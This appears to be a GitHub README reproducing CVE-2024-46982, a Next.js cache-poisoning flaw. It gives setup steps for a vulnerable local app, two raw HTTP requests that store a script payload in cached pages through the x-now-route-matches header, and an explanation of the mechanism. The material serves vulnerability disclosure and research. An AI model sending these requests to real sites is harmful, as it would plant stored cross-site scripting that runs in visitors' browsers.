samuel871211/CVE-2024-46982-Reproduction
Getting Started

  1. Install Node.js LTS
  2. npm install (this installs the vulnerable Next.js version pinned in package.json; the bug was fixed upstream in Next.js 14.2.10 and 13.5.7)
  3. npm run build (this also writes the build id to .next/BUILD_ID, which Exploitation 2 needs)
  4. npm run start

Exploitation 1: Stored XSS via Cache Poisoning

  1. Send the following HTTP request (Attack Request) using any HTTP client. The User-Agent value is the payload that ends up in the cached page.
GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1

  2. Visit http://localhost:3000 (Normal Request) using any Web Browser. The page is served from the poisoned cache, so the payload runs without the header or query string being present in the browser's request.

Exploitation 2: Stored XSS via Cache Poisoning (via the /_next/data route)

  1. Send the following HTTP request (Attack Request) using any HTTP client. Replace "UiKoKFFGnF1td3mMyeDX5" with the contents of your ".next/BUILD_ID" file (written by npm run build); a wrong build id returns 404 instead of poisoning the cache.
GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1

  2. Visit http://localhost:3000 (Normal Request) using any Web Browser.

How does it work ?

  1. x-now-route-matches is a custom HTTP header recognized by Next.js. When it is present, Next.js treats the request as "SSG" (Static Site Generation) instead of a normal server-side render, so the response is marked cacheable (Cache-Control: s-maxage=1, stale-while-revalidate) and stored; later requests that do not carry the header receive the stored copy, including whatever the attacker placed in the rendered props (here, the User-Agent).

  2. ?__nextDataReq=1 is a query string parameter recognized by Next.js. When it is present, Next.js treats the request as a request for __NEXT_DATA__, i.e. the page's props serialized as JSON, which is the same data the /_next/data/<BUILD_ID>/poc.json route returns.

A full writeup is linked in the Credit section.

Credit

About

Reproduction of CVE-2024-46982
